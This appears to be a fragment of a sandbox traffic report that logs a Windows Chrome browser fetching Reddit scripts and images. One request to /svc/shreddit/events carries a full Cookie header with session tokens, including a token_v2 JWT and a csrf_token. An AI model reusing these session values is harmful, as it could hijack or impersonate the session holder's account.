Source: global trafficHTTP traffic detected: GET /t5_3oeyf/styles/communityIcon_a6wc6wasleke1.png?width=96&height=96&frame=1&auto=webp&crop=96:96,smart&s=dd83bae6c63d05f374cae1480faeb620c32524f6 HTTP/1.1Host: styles.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2vq0w/styles/communityIcon_6f0n71jeeund1.jpg?width=96&height=96&frame=1&auto=webp&crop=96:96,smart&s=af8f886b0764af894227b5f1d0f8c947131eaad7 HTTP/1.1Host: styles.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2we4j/styles/communityIcon_k5n4c7i07t4d1.png?width=96&height=96&frame=1&auto=webp&crop=96:96,smart&s=91218d80e2b4db5ffbd035f2e09a1ead6917da49 HTTP/1.1Host: styles.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/hui-grid-client-js-38860f05.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/trending-carousel-client-js-a7af9692.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/popular-communities-client-js-26b5cc9d.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/auth-overlay-client-js-6253058a.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/mod-inline-actions-client-js-46e8a0f2.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/mod-content-state-indicators-client-js-6fc5ebb5.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/mod-removal-reason-form-client-js-60fb2451.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/popular-feed-client-js-5048ccd1.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/index-56e4320e.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/viral-community-client-js-4ec0c36b.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/community-value-upsell-bottom-bar-client-js-c411c424.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/xpromo-nsfw-auth-blocking-modal-client-js-df90f341.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/auth-flow-sso-buttons-894aeb0c.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/xpromo-nsfw-auth-blocking-modal-client-js-df90f341.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/ui-strings-aad5fab2.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/xpromo-nsfw-auth-blocking-modal-client-js-df90f341.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/auth-flow-controller-2182cb9c.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/xpromo-nsfw-auth-blocking-modal-client-js-df90f341.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/password-recovery-fa619c78.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/xpromo-nsfw-auth-blocking-modal-client-js-df90f341.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/helpers-82480d34.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/xpromo-nsfw-auth-blocking-modal-client-js-df90f341.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/club-award-confirmation-client-js-b22d6f4f.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/xpromo-nsfw-auth-blocking-modal-client-js-df90f341.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/google-api-d2fdd9a3.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/xpromo-nsfw-auth-blocking-modal-client-js-df90f341.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/with-recaptcha-72aa2ce9.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/xpromo-nsfw-auth-blocking-modal-client-js-df90f341.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/w3-report-from-v2-event-92975fc1.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/reputation-recaptcha-ba0b694c.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/screen-reader-alert-outlet-709e38dd.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/reddit-header-action-items-ef3cf68d.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/header-action-item-chat-client-js-98797a42.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/faceplate-dropdown-menu-f991e0ba.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /svc/shreddit/events HTTP/1.1Host: www.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344520456.Z0FBQUFBQm9COWdJeDkxZHk3RkpuYmZrSEFIZm45SWl3TU9Qdm5oZjVoV0RXb2I0aFp6MXcxSGc5Z1NMcVJGUkNCMUViUmNIOW5jODdGMndsTURaSWdVVmNEUmgxS2JoQ1dTU2dIQjRCVkVSeTdHNy1yaDQ3cXM4MHhaLW1yU2R3clhCZXduWXRtb1o
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/reddit-skip-to-sidebar-dfe7d725.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-sort-dropdown-bef85a78.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/faceplate-hovercard-74cbfc29.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-distinguished-post-tags-600428b5.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dP5fFEO6XTK_bmmHMeUdZSBYh5mT42xU5DThZ2ugVd0.png?width=640&crop=smart&format=pjpg&auto=webp&s=718bb239cfaaa5b6a857036355cbf36e06007608 HTTP/1.1Host: external-preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_dijpkz/styles/profileIcon_akbki6b145he1.png?width=48&height=48&frame=1&auto=webp&crop=&s=f71319db70cb345de1bf4e719e5cad9dd5918093 HTTP/1.1Host: styles.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-post-overflow-menu-cfb336ae.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/shell-4994f581.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
